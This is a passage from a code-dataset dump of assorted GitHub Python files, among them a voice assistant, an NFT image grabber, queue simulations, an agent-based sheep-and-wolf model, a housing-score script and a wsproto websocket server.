\"None\"\n return query\n\nif __name__ == \"__main__\":\n wish()\n\n while True:\n query = takeCommand().lower()\n\n # wikipedia logic\n if 'wikipedia' in query:\n speak(\"searching wikipedia....\")\n query = query.replace(\"wikipedia\",\"\")\n results = wikipedia.summary(query,sentences=2)\n print(results)\n speak(results)\n\n # for opening website in browser\n elif \"open youtube\" in query:\n webbrowser.open(\"youtube.com\")\n elif \"open google\" in query:\n webbrowser.open(\"google.com\")","repo_name":"Rohit-Gupta11/Basic-Virtual-Asistent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11628116105","text":"# -*- coding: utf-8 -*-\n# (c) 2020 Praxya - Aitor Rosell Torralba \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom odoo import models, fields, api, http\nfrom pyfcm import FCMNotification\n\n\nclass ResCompany(models.Model):\n _inherit = \"res.company\"\n\n push_service_object = False\n\n @api.multi\n def push_service(self):\n self.ensure_one()\n if not self.push_service_object:\n self.push_service_object = FCMNotification(api_key=\"ANONYM\")\n return self.push_service_object\n\n app_api_key = fields.Char(default=\"ANONYM\", string=\"API KEY de la App\")\n app_private_key = fields.Char(default=\"ANONYM\", string=\"PRIVATE KEY de la App\")\n app_url = fields.Char(default=\"ANONYM\", string=\"URL de la App\")\n\n","repo_name":"takashi1kun/aitor-odoo-stuff","sub_path":"anonbussiness_app_api/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"614621266","text":"import requests, os, asyncio, aiofiles, time, imageio\nfrom aiohttp import ClientConnectionError, ClientSession\n\nstart = time.time()\n\nif os.path.exists('rilla_assets.txt'):\n with open('rilla_assets.txt') as f:\n assets = set(map(int, f.read().split(', ')))\nelse:\n creators = ['PO4CEJB6IV2P5UACZ3P77KJCITMX2ZIT6RMW4WTX6JQGJYNJS6T5E4V27Q', 'MPRRGD2IXHYNHRMOFD5AE6Y2KK6DL32GKDFIZG7SC6TYO6AKK7CZSSBKTA','2QDW33WUCFKDNEZEZPBF7MCJUOFWOTOPAL64NHHVXUXE5B6L5VKQMPYZXA']\n assets = set()\n\n for creator in creators:\n url = f'https://algoindexer.algoexplorerapi.io/v2/assets?creator={creator}'\n data = requests.get(url).json()\n while 'next-token' in data:\n for asset in data['assets']:\n assets.add(asset['index'])\n data = requests.get(url+f'&next={data[\"next-token\"]}').json()\n\n with open('rilla_assets.txt', 'w') as outfile:\n data = str(assets)[1:-1]\n outfile.write(data)\n\n\nwallet = 'GCDW4TJFIDZZJME4NYUWSQWYGEUDSNSMMEQ4JYH7PM7CRQAUXTJFDDOC2A'\nwallet_url = f'https://algoindexer.algoexplorerapi.io/v2/accounts/{wallet}'\nwallet_data = requests.get(wallet_url).json()\nrillas = set()\nfor asset in wallet_data['account']['assets']:\n if asset['asset-id'] in assets and asset['amount'] == 1:\n rillas.add(asset['asset-id'])\n\nasync def fetch_rilla(wallet, rilla_id, session):\n rand_url = f'https://www.randgallery.com/cdn-cgi/image/height=512,quality=80,format=auto,onerror=redirect/cache/images/{rilla_id}.png?v2'\n file_name = f'{wallet}/{rilla_id}.jpeg'\n try:\n resp = await session.request(method='GET', url =rand_url)\n async for data in resp.content.iter_chunked(1024):\n async with aiofiles.open(file_name, \"ba\") as f:\n await f.write(data)\n\n except ClientConnectionError:\n return(url, 404)\n return file_name\n\n\nasync def fetch_all_rillas(wallet, rillas):\n if not os.path.exists(wallet):\n os.mkdir(wallet)\n async with ClientSession() as session:\n tasks = []\n for rilla in rillas:\n tasks.append(\n fetch_rilla(wallet, rilla, session)\n )\n results = await asyncio.gather(*tasks)\n\n images = []\n for file_name in results:\n images.append(imageio.imread(file_name))\n imageio.mimsave(f'{wallet}.gif', images, duration=.5)\n\nasyncio.run(fetch_all_rillas(wallet, rillas))\nprint(time.time() - start)\n","repo_name":"truunfederalagent/rilla-gifs","sub_path":"rilla_grabber.py","file_name":"rilla_grabber.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18140546927","text":"import random\n\ndef enqueueJob(jobs, job):\n i = 0\n while i < len(jobs) and jobs[i][0] < job[0]:\n i += 1\n if 0 < i < len(jobs):\n jobs.insert(i - 1, job)\n else:\n jobs.insert(i, job)\n\n\ndef EventSimulation(distribution, jobProcessor, jobsAmount=0, returnPercentage=0):\n processedJobs = 0\n currentQueueLen = 0\n maxQueueLen = 0\n\n jobs = [[distribution.GetRandomValue(), 'g']]\n\n free, isProcessed = True, False\n\n generatedJobs = 0\n returnedJobs = 0\n\n while processedJobs < jobsAmount + returnedJobs:\n\n job = jobs.pop(0)\n\n if job[1] == 'g' and generatedJobs <= jobsAmount:\n\n currentQueueLen += 1\n generatedJobs += 1\n\n if currentQueueLen > maxQueueLen:\n maxQueueLen = currentQueueLen\n\n enqueueJob(jobs, [job[0] + distribution.GetRandomValue(), 'g'])\n\n if free:\n isProcessed = True\n\n elif job[1] == 'p':\n\n processedJobs += 1\n\n if random.randint(1, 100) <= returnPercentage:\n returnedJobs += 1\n currentQueueLen += 1\n\n isProcessed = True\n\n if isProcessed:\n\n if currentQueueLen > 0:\n currentQueueLen -= 1\n t = jobProcessor.GetRandomValue()\n enqueueJob(jobs, [job[0] + t, 'p'])\n free = False\n else:\n free = True\n isProcessed = False\n\n return maxQueueLen, processedJobs, returnedJobs\n\n\ndef TimekeepingSimulation(distribution, jobProcessor, jobsAmount=0, returnPercentage=0, step=0.001):\n processedJobs = 0\n\n currentTime = step\n generationTime = distribution.GetRandomValue()\n processTime = 0\n\n currentQueueLen = maxQueueLen = 0\n generatedJobs = 0\n returnedJobs = 0\n\n while processedJobs < jobsAmount + returnedJobs:\n \n if currentTime > generationTime and generatedJobs <= jobsAmount:\n currentQueueLen += 1\n generatedJobs += 1\n if currentQueueLen > maxQueueLen:\n maxQueueLen = currentQueueLen\n generationTime += distribution.GetRandomValue()\n\n if currentTime > processTime:\n if currentQueueLen > 0:\n processedJobs += 1\n\n if random.randint(1, 100) <= returnPercentage:\n returnedJobs += 1\n currentQueueLen += 1\n\n currentQueueLen -= 1\n processTime += jobProcessor.GetRandomValue()\n currentTime += step\n\n return maxQueueLen, processedJobs, returnedJobs","repo_name":"honeycarbs/bmstu-modeling-7sem","sub_path":"lab-04/code/queueing/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10252154031","text":"from turtle import * \n\nmau = ['red','blue','brown','yellow','grey']\n\nfor hinh in range (5):\n color(mau[hinh])\n begin_fill()\n # vẽ hình chữ nhật\n for i in range (2): \n for cn in range (1,3): \n forward(50*cn)\n right(90)\n end_fill()\n forward(50)\nmainloop()","repo_name":"quocthai200x/NguyenXuanQuocThai-Fundamentals-C4E27","sub_path":"session 3/HW3/hinh2.py","file_name":"hinh2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71498072872","text":"import logging\n\n# logging.basicConfig(\n# level= logging.DEBUG ,\n# format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' ,\n# datefmt='%m/%d/%Y %H:%M:%S'\n# )\n\n# # types of loggings\n# logging.debug(\"This is a debug message\")\n# logging.info(\"This is a info message\")\n# logging.warning(\"This is a warning message\")\n# logging.error(\"This is a error message\")\n# logging.critical(\"This is a critical message\")\n\n# # define logg handlers\n# logger = logging.getLogger(__name__)\n\n# stream_h = logging.StreamHandler()\n# file_h = logging.FileHandler('file.log')\n\n# # level& format for each handler\n# stream_h.setLevel(level=logging.WARNING)\n# file_h.setLevel(level=logging.ERROR)\n\n# formatter = logging.Formatter( '%(name)s - %(levelname)s - %(message)s' )\n# stream_h.setFormatter(formatter)\n# file_h.setFormatter(formatter)\n\n# # add handler to the logger\n# logger.addHandler(stream_h)\n# logger.addHandler(file_h)\n\n# # log\n# logger.warning(\"This is a warning\")\n# logger.error(\"This is a error\")\n\n#-------------------- loading from config ----------------------------\n\n# import logging.config\n\n# logging.config.fileConfig('logging.conf')\n\n# logger = logging.getLogger('simpleExample')\n# logger.debug(\"This is a debug message\")\n\n\n#------------------- error logging --------------------------------\n# import traceback\n\n# try :\n# a = [1,2,3]\n# val = a[4]\n# except :\n# logging.error( \"The error is %s\" , traceback.format_exc() )\n\n\n# --------------------- rotating handlers (for big application keep latest logs)-------------------------\nfrom logging.handlers import RotatingFileHandler , TimedRotatingFileHandler\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\n# roll over after 2KB and keep backup logs app.log , app.log2\nhandler = RotatingFileHandler( 'app.log' , maxBytes=2000 , backupCount=5 )\n\n# roll over preset time s,m.h,d,midnight \nhandler_time = TimedRotatingFileHandler( 'timed_test.log', \n when='s', \n interval=5 , \n backupCount=5 )\n\nlogger.addHandler(handler)\n\nfor _ in range(1000):\n logger.info('helo , world !')\n\n\n\n\n\n\n\n","repo_name":"himasha0421/Advance-Python-World","sub_path":"logging_styles/logging_func.py","file_name":"logging_func.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9543602741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 31 16:13:15 2022\n\n@author: Elliot\n\nThis exercise uses Object Oriented Programming to create an Agent Based Model \n(A model showing sheeps interaction with an environment)\n\nSteps \n\n1. Import Libaries and files being worked with. (Line 29 - 38) \nThe agentframe and environ files are integral parts of this \nmodel which allow it to run. Importing them here allows Model to read in code from these files. \n\nThe matplotlib library allow us to visualise model (Line 147 - 160)\n\n2. Create Agents and Wolf- See Agentframework.py \n\n3. Function to find distance bewteen agents.\nFor function, distance_between, the program goes through rows x and y and calculates \nthe distance using the Pythagoras' theorem.\n\n4. Create Environment. - See environ.py \n\n5. Run Agent_Based_Model \n\"\"\"\n# Imports Libraries \nimport matplotlib\nmatplotlib.use('TkAgg') #TkAgg renders data to a tk Canvas\nimport tkinter \nimport matplotlib.pyplot\nimport agentframework\nimport environ\nimport matplotlib.animation\nimport random\nimport requests\nimport bs4\n\n\n#Defining Variables \nnum_of_iterations = 500 # Number of times model runs \nnum_of_agents = 20 # Agents in model \nneighbourhood = 10 \nagents= [] # Creates List of Agents.\nwolves=[] # Creates List of wolves.\n\n\n\"\"\"\nWebScrapping \n\nData from the site stated in the website below is drawn into this model\nThis data is assigned to x and y values determining its initial starting positon of Agents. \n\"\"\"\n\nr = requests.get('http://www.geog.leeds.ac.uk/courses/computing/practicals/python/agent-framework/part9/data.html')\ncontent = r.text\nsoup = bs4.BeautifulSoup(content, 'html.parser')\ntd_ys = soup.find_all(attrs={\"class\" : \"y\"})\ntd_xs = soup.find_all(attrs={\"class\" : \"x\"})\n\n\"\"\"Web Scrapping test\"\"\"\nprint(td_ys, td_xs) \n\n\n#Reads in environment\nenvironment = environ.readEnvironment()\n\n\n\"\"\"Environment Test\"\"\" \n#a = agentframework.Agent(environment)\n#print(a._y, a._x)\n\n\n#Define parameters of Canvas\nfig = matplotlib.pyplot.figure(figsize=(7, 7))\nax = fig.add_axes([0, 0, 1, 1])\n\n\n\"\"\" \nAgents are created and enabled to interact with its environment\nThe loop goes through the number of agents, determines its starting positions of agents and creates it by drawing out attributes \nfrom agentframework. It them appends it to the list forming agents\n\n\"\"\" \nfor i in range (num_of_agents): #Creats a loop going through number of agents \n y = int(td_ys[i].text)\n x = int(td_xs[i].text)\n \n#Creates agent instance on line 89 while attaching the elements environment and agents.\n sheep = agentframework.Agent(i,environment, agents, x, y)\n agents.append(sheep) \n \n\"\"\" \nOutside the loop we create a wolf which goes through the same motion of drowing out its attributes from the framework and \ncreating a wolf\n\n\"\"\" \n \nwolve= agentframework.Agent(num_of_agents, environment, agents, x, y)\nwolves.append(wolve)\n\n\ndef update(frame_number):\n\n \"\"\"Once canvas is drawn. It updates the canvas per frame_number. \n \n If the arguement frame_number isn't passed frame is not updated.\n \n Parameters\n ----------\n frame_number : int,\n Number of times frames after which canvas is cleared and redrawn \n ------\n \"\"\"\n fig.clear() \n global carry_on\n \n\n#Agentframework Tasks \n random.shuffle(agents) # Agent order is randomized \n \n#Loops through list of agents and calls agent methods defined in agentframework. This gives agency to created agents \n for i in range (num_of_agents):\n #print (agents[i].i)\n \n agent = agents[i]\n#This if statement is a condition which states if agents are a live, show them on screen. If they die, take them off screen.\n if agent.living:\n agent.move()\n agent.eat()\n agent.shared_neigbourhood(neighbourhood)\n#Wolves are outside the if statement because they are alive and doing the killing\n wolves[0].move()\n wolves[0].eatsheep(neighbourhood)\n \n#what does this do ?????????????????????? \n if random.random() < 0.1:\n carry_on = False\n #print(\"stopping condition\")\n else:\n carry_on = True\n #print(\"Continuing\")\n\n\n#Displays Environment \n matplotlib.pyplot.ylim(0,250) \n matplotlib.pyplot.xlim(0,250)\n matplotlib.pyplot.imshow(environment)\n matplotlib.pyplot.xlabel('Sheep are white, Wolf is brown')\n matplotlib.pyplot.title(label=\"Sheep in trouble, Wolf on the loose\",\n loc=\"center\",\n fontstyle='italic')\n \n \n#Displays agents on Environment\n for i in range (num_of_agents):\n if agents[i].living:\n matplotlib.pyplot.scatter(agents[i]._y,agents[i]._x,c=\"white\") # y and x points (Sheep) plots on map, colour white\n matplotlib.pyplot.scatter(wolves[0]._y,wolves[0]._x,c=\"brown\") # y and x points plot on map (wolf), colour brown\n\n\nmatplotlib.pyplot.show()\n\n\"\"\"\nCreates Graphic User Invterface. Run function and quit function are commands which all model to be run and stopped from GUI\ntkinter.Menue creates the menu bar with model_menu.add_commands creating button to execute function defined above\n\"\"\"\n\ndef run(): \n \n \"\"\"This runs simulation. \n \n Parameters\n ----------\n Does not take any parameters.\n ------\n \"\"\"\n animation = matplotlib.animation.FuncAnimation(fig, update, interval=1, repeat=False, frames=50)\n canvas.draw()\n\ndef quit():\n \n \"\"\"This stops the simulation.\n \n Parameters\n ----------\n Does not take any parameters. \n ------\n \"\"\"\n global root\n root.quit()\n\n'''Creates GUI'''\n\nroot = tkinter.Tk() \nroot.wm_title(\"Model\")\ncanvas = matplotlib.backends.backend_tkagg.FigureCanvasTkAgg(fig, master=root,)\ncanvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n \nmenu_bar = tkinter.Menu(root)\nroot.config(menu=menu_bar)\nmodel_menu = tkinter.Menu(menu_bar)\nmenu_bar.add_cascade(label=\"Model\", menu=model_menu)\nmodel_menu.add_command(label=\"Run model\", command=run, state=\"normal\") \nmodel_menu.add_command(label=\"Clear model\", command=quit, state=\"normal\")\n\n\ntkinter.mainloop()\n\n\n\n \n","repo_name":"elliotkarikari/MSc-Submission-ABM","sub_path":"GIS Workbook/Model_Based_Agents.py","file_name":"Model_Based_Agents.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3301767175","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport torch\nfrom gym_chess_env import ChessBoard_gym\nfrom agent_chess_pytorch import DQN\nimport numpy as np\nimport math\nimport chess\n\n\n\n\n# In[2]:\nclass Gen_Legal_move:\n def __init__(self, model_weights=\"checkpoint.pth-4rook_best-adamw.tar\"):\n super(Gen_Legal_move, self).__init__()\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = DQN(8,8,112).to(device)\n model = load_from_saved_model(model,model_weights)\n \n def load_from_saved_model(model, path = \"checkpoint.pth.tar\"):\n checkpoint = torch.load(path)\n model.load_state_dict(checkpoint['state_dict'])\n return(model)\n\n def generate_legal_moves(board, num_moves):\n state = torch.from_numpy(env.reset()).float()\n env = ChessBoard_gym()\n env.set_board(board)\n starting_pos_FEN = env.get_FEN()\n\n observation_space = 64\n state_model_input = torch.reshape(state, [1, observation_space])\n \n action_id = model(state_model_input).argmax(1)[0].detach()\n legal_move_ids = []\n for i in range(0,num_moves):\n next_state,reward, _, _ = env.step(action_id)\n next_state_model_input = torch.from_numpy(next_state).float()\n next_state_model_input = torch.reshape(next_state_model_input, [1, observation_space])\n action_id = actions_list.argmax(1)[0].detach()\n legal_move_ids.append(action_id)\n\n return(legal_move_ids)\n\n","repo_name":"pnarsina/w251_chess_objectid_n_rl","sub_path":"rl_model_generate_legalMoves.py","file_name":"rl_model_generate_legalMoves.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35331433090","text":"from PygameManager import PygameManager\nfrom QueueStepper import QueueStepper\nimport pygame\n\npygameManager = PygameManager(pygame)\npygameManager.setup()\n\nqueueStepper = QueueStepper(\"Chapters.json\", pygame)\n\nprogrammAktiv = True\n\nwhile (programmAktiv and not queueStepper.isEndReached()):\n for event in pygame.event.get():\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_q:\n programmAktiv = False\n if event.key == pygame.K_a:\n queueStepper.nextStep()\n pygameManager.clockTick()\npygameManager.teardown()","repo_name":"Sosian/VoiceControlBachelorThesis","sub_path":"VoiceControl.py","file_name":"VoiceControl.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5165439530","text":"import os\nimport pandas as pd\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nfrom inspect import getsourcefile\nfrom os.path import abspath\n\nfrom transit_score import transit_score\n\n#set active directory to file location\ndirectory = abspath(getsourcefile(lambda:0))\n#check if system uses forward or backslashes for writing directories\nif(directory.rfind(\"/\") != -1):\n newDirectory = directory[:(directory.rfind(\"/\")+1)]\nelse:\n newDirectory = directory[:(directory.rfind(\"\\\\\")+1)]\nos.chdir(newDirectory)\n\ndef create_property_scores():\n #list of geodataframes - each one is a different amenity\n amenities = []\n \n #import ammenities: bus stops, grocery stores, hospitals, etc. \n #list of files in 'amenity data'\n amenity_files = os.listdir('amenity data')\n for file in amenity_files:\n df = pd.read_csv('amenity data/'+file)\n #convert to gdf using Latitude\tLongitude\n gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.Longitude, df.Latitude))\n gdf['category'] = file[:-4]\n #wgs84 is the standard lat/long coordinate system\n gdf.crs = 'epsg:4326'\n #convert to NAD UTM 10N\n gdf = gdf.to_crs('epsg:26910')\n amenities.append(gdf)\n\n properties = gpd.read_file(\"CRD Properties/core muni properties dissolved.geojson\")\n #drop all columns except geometry and AddressCombined\n properties = properties[['geometry', 'AddressCombined']]\n\n properties = properties.to_crs('epsg:26910')\n\n #check for invalid geometries\n properties = properties[properties.is_valid]\n\n #calculate transit score\n print(\"Calculating transit score...\")\n properties = transit_score(properties)\n\n #reset index\n properties = properties.reset_index()\n \n for amenity in amenities:\n category = amenity['category'][0]\n properties[category] = 0\n\n buffer = gpd.GeoDataFrame(geometry=amenity.buffer(800,resolution=1))\n\n # Perform a spatial join operation between the two datasets\n properties_within_buffer = gpd.sjoin(properties, buffer, predicate='intersects')\n\n # Create a new column called category and assign a value of 1 to all rows\n properties_within_buffer[category] = 1\n\n # Update the 'amenity' column in the original properties dataset for the properties within the buffer\n properties.loc[properties_within_buffer.index, category] = 1\n\n print(\"Analyzed {}. {} amenities in dataset, {} properties within 800m buffer.\".format(category, len(amenity), len(properties_within_buffer))) \n\n properties = properties.to_crs('epsg:4326') \n\n #MERGE WITH HFL ZONING DATA\n\n #import zoning data\n zoning = gpd.read_file('zoning/Harmonized_Zones.shp')\n zoning = zoning[['SIMPLIFIED', 'geometry']]\n zoning = zoning.to_crs('epsg:4326')\n zoning = zoning.rename(columns={'SIMPLIFIED': 'Current Zoning'})\n\n #perform spatial join. Find zoning for each property, create 'zone' column in properties with zoning.\n #zoning has a 'SIMPLIFIED' column. This is the zoning type.\n print(len(properties))\n\n original_geometry = properties.geometry\n \n #Zoning maps being aligned with the edge of properties is causing multiple zones to be assigned to each property.\n #Scaling properties down by 70% to fix most of this. Doesn't always work.\n\n properties.geometry = properties.geometry.scale(xfact=0.7, yfact=0.7, zfact=0.7, origin=\"centroid\")\n properties = gpd.sjoin(properties, zoning, how='left', predicate='intersects')\n properties.geometry = original_geometry\n\n #if there's multiple rows with the same geometry/Address, go with the first one. There's a few edge cases where this happens and it's on my list of things to investigate.\n properties = properties.drop_duplicates(subset=['geometry'], keep='first')\n properties = properties.drop_duplicates(subset=['AddressCombined'], keep='first')\n\n print(len(properties))\n properties = properties.reset_index(drop=True)\n properties = properties.drop(columns=['index_right'])\n\n properties.to_file(\"CRD Properties/scored_properties.geojson\", driver='GeoJSON')\n\n return\n\ndef aggregate_amenities(properties):\n \n #import weights\n weights = pd.read_csv('amenity weights.csv')\n\n properties['amenity_score'] = 0\n\n #for coloumns that aren't index, AddressCombined, transit_score, or geometry:\n #multiply by weight\n #add to amenity_score\n properties = properties.to_crs('epsg:4326')\n\n for col in properties.columns:\n if(col not in ['index', 'AddressCombined', 'transit_score', 'geometry','amenity_score', 'Current Zoning']):\n print(col)\n w = weights[weights['amenity'] == col]['weight'].values[0]\n properties[col] = properties[col].astype(int)\n properties['amenity_score'] = properties['amenity_score'] + w*properties[col]\n \n #normalize amenity score from 0 to 1\n properties['amenity_score'] = properties['amenity_score']/properties['amenity_score'].max()\n \n #transit_score is from 0 to 1. arbitrary weights\n properties['OCP Score'] = 0.5*properties['transit_score'] + 0.5*properties['amenity_score']\n\n properties = properties[['geometry', 'AddressCombined', 'amenity_score', 'transit_score', 'OCP Score', 'Current Zoning']]\n\n #multiply by 100 and then round to an integer using round()\n properties['amenity_score'] = round(100*properties['amenity_score'])\n properties['transit_score'] = round(100*properties['transit_score'])\n properties['OCP Score'] = round(100*properties['OCP Score'])\n\n return(properties)\n\n#call this function before running mapping\n\n#create_property_scores()","repo_name":"homesforliving/OCP-Reform","sub_path":"OCP_score_generation.py","file_name":"OCP_score_generation.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"698167110","text":"import typing\r\nimport asyncio\r\nimport logging\r\nimport enum\r\nimport time\r\n\r\n# wsproto\r\nimport wsproto\r\nimport wsproto.events\r\n\r\nfrom hatsu.types import Scope, Transport, Protocol\r\nfrom hatsu.utils import get_addr, get_scheme\r\n\r\nif typing.TYPE_CHECKING:\r\n from hatsu.core.server import Server\r\n\r\nfrom urllib.parse import unquote\r\n\r\nclass WebsocketState(enum.Enum):\r\n HANDSHAKE = 0\r\n CONNECTED = 1\r\n CLOSED = 2\r\n\r\nclass WSProtoImpl(Protocol):\r\n \"\"\"A ws implementation using `asyncio.Protocol`.\"\"\"\r\n\r\n def __init__(self, server: \"Server\") -> None:\r\n self.server = server\r\n\r\n # Logging.\r\n self.logger = logging.getLogger('hatsu.protocols.websocket_wsproto')\r\n\r\n # Asyncio.\r\n self.loop = asyncio.get_event_loop()\r\n\r\n # Connection state.\r\n self.transport = None\r\n self.peername = None\r\n self.sockname = None\r\n self.connection = wsproto.WSConnection(\r\n wsproto.ConnectionType.SERVER\r\n )\r\n self.queue = asyncio.Queue()\r\n self.handshake_complete = False\r\n\r\n # Send and recv state.\r\n self.start_end = False\r\n self.body_end = False\r\n self.send_close = False\r\n self.state = WebsocketState.HANDSHAKE\r\n\r\n # Ping control.\r\n self.last_ping = time.time()\r\n\r\n # Flow control.\r\n self.write_pause = False\r\n self.read_pause = False\r\n\r\n # Buffer.\r\n self.text = \"\"\r\n self.bytes = b\"\"\r\n\r\n def connection_made(self, transport: Transport) -> None:\r\n # When a connection is initialized\r\n # it save the `transport` to the class\r\n # so it can be used later.\r\n\r\n self.server.connections.add(self)\r\n\r\n self.transport = transport\r\n self.schme = get_scheme(self.transport, type=\"websocket\")\r\n self.peername = get_addr(self.transport, type=\"peername\")\r\n self.sockname = get_addr(self.transport, type=\"sockname\")\r\n\r\n self.logger.debug('Connection made.')\r\n\r\n def connection_lost(self, exc: typing.Optional[Exception]) -> None:\r\n # When a connection is closed\r\n # it updates the `request` state\r\n # to `disconnected.`\r\n\r\n self.server.connections.discard(self)\r\n self.logger.debug(\"Connection closed.\")\r\n\r\n if self.read_pause is True:\r\n self.read_pause = False\r\n self.transport.resume_reading()\r\n\r\n self.transport.close()\r\n\r\n def data_received(self, data: bytes) -> None:\r\n # Called when the packet is complete.\r\n\r\n if len(data) > self.server.ws_max_size:\r\n raise ValueError(\"Data is too big.\")\r\n\r\n self.connection.receive_data(data)\r\n\r\n def __request__(event: wsproto.events.Request):\r\n # Called when the request is complete\r\n # it also build the scope.\r\n\r\n self.handshake_complete = True\r\n\r\n headers = [\r\n (b\"host\", event.host.encode(\"utf-8\")),\r\n *event.extra_headers\r\n ]\r\n raw_path, _, query_string = event.target.partition(\"?\")\r\n self.scope: \"Scope\" = {\r\n \"type\": \"websocket\",\r\n \"asgi\": {\r\n \"version\": \"3\",\r\n \"spec_version\": \"2.3\"\r\n },\r\n \"http_version\": \"1.1\",\r\n \"scheme\": self.schme,\r\n \"path\": unquote(raw_path),\r\n \"query_string\": query_string,\r\n \"root_path\": self.server.root_path,\r\n \"headers\": headers,\r\n \"client\": self.peername,\r\n \"server\": self.sockname,\r\n \"subprotocls\": event.subprotocols\r\n }\r\n message = {\r\n \"type\": \"websocket.connect\"\r\n }\r\n self.queue.put_nowait(message)\r\n\r\n if self.server.limit_concurrency is not None:\r\n if len(self.server.connections) >= self.server.limit_concurrency \\\r\n or len(self.server.tasks) >= self.server.limit_concurrency:\r\n self.logger.warning(\"Exceeded concurrency limit.\")\r\n\r\n self.app = self.server.application\r\n\r\n task = self.loop.create_task(\r\n self.app(\r\n self.scope, self.asgi_recv, self.asgi_send\r\n )\r\n )\r\n task.add_done_callback(self.server.tasks.discard)\r\n self.server.tasks.add(task)\r\n\r\n def __byte_message__(event: wsproto.events.BytesMessage):\r\n # Called when the client sends a message.\r\n self.bytes += event.data\r\n\r\n if event.message_finished is True:\r\n message = {\r\n \"type\": \"websocket.receive\",\r\n \"bytes\": self.bytes\r\n }\r\n self.queue.put_nowait(message)\r\n self.bytes = b\"\"\r\n\r\n def __text_message__(event: wsproto.events.TextMessage):\r\n # Called when the client sends a message.\r\n self.text += event.data\r\n\r\n if event.message_finished is True:\r\n message = {\r\n \"type\": \"websocket.receive\",\r\n \"text\": self.text\r\n }\r\n self.queue.put_nowait(message)\r\n self.text = \"\"\r\n\r\n def __close__(event: wsproto.events.CloseConnection):\r\n # Called when the connection is about to close.\r\n\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": event.code\r\n }\r\n self.queue.put_nowait(message)\r\n self.transport.close()\r\n\r\n def __ping__(event: wsproto.events.Ping):\r\n # Called when the server recv ping.\r\n\r\n if time.time() - (self.last_ping - self.server.ws_ping_interval):\r\n return\r\n\r\n self.transport.write(\r\n self.conn.send(event.response())\r\n )\r\n\r\n def __close__(event: wsproto.events.CloseConnection):\r\n # Called when the server recv close.\r\n\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": event.code\r\n }\r\n self.queue.put_nowait(message)\r\n self.transport.close()\r\n\r\n handlers = {\r\n wsproto.events.Request: __request__,\r\n wsproto.events.TextMessage: __text_message__,\r\n wsproto.events.BytesMessage: __byte_message__,\r\n wsproto.events.Ping: __ping__,\r\n wsproto.events.CloseConnection: __close__,\r\n }\r\n\r\n for event in self.connection.events():\r\n event_type = type(event)\r\n handlers[event_type](event)\r\n\r\n async def asgi_send(self, message):\r\n # Send interface for the application.\r\n\r\n if self.state is WebsocketState.HANDSHAKE:\r\n if message[\"type\"] != \"websocket.accept\":\r\n # TODO: MAKE IT BETTER.\r\n raise ValueError(\"Can't send this message in that state.\")\r\n\r\n subprotocls = message.get(\"subprotocls\")\r\n event = wsproto.events.AcceptConnection(\r\n subprotocol=subprotocls\r\n )\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n self.start_end = True\r\n self.state = WebsocketState.CONNECTED\r\n\r\n self.logger.debug(\r\n f'Websocket handshake complete. ({self.peername})'\r\n )\r\n\r\n elif self.state is WebsocketState.CONNECTED:\r\n if message[\"type\"] not in (\"websocket.send\", \"websocket.close\"):\r\n # TODO: MAKE IT BETTER.\r\n raise ValueError(\"Can't send this message in that state.\")\r\n\r\n if message[\"type\"] == \"websocket.close\":\r\n code, reason = message.get(\"code\"), \\\r\n message.get(\"reason\", \"\")\r\n event = wsproto.events.CloseConnection(\r\n code=code, reason=reason\r\n )\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": code\r\n }\r\n\r\n self.queue.put_nowait(message)\r\n if self.transport.is_closing() is False:\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n self.transport.close()\r\n\r\n if self.transport.is_closing() is False:\r\n text = message.get('text', None)\r\n bytes = message.get('bytes', None)\r\n\r\n if text is not None:\r\n event = wsproto.events.TextMessage(\r\n data=text\r\n )\r\n elif bytes is not None:\r\n event = wsproto.events.BytesMessage(\r\n data=bytes\r\n )\r\n\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n\r\n async def asgi_recv(self):\r\n # Recv interface for the application.\r\n\r\n message = await self.queue.get()\r\n if self.read_pause is True and self.queue.empty():\r\n self.read_pause = False\r\n 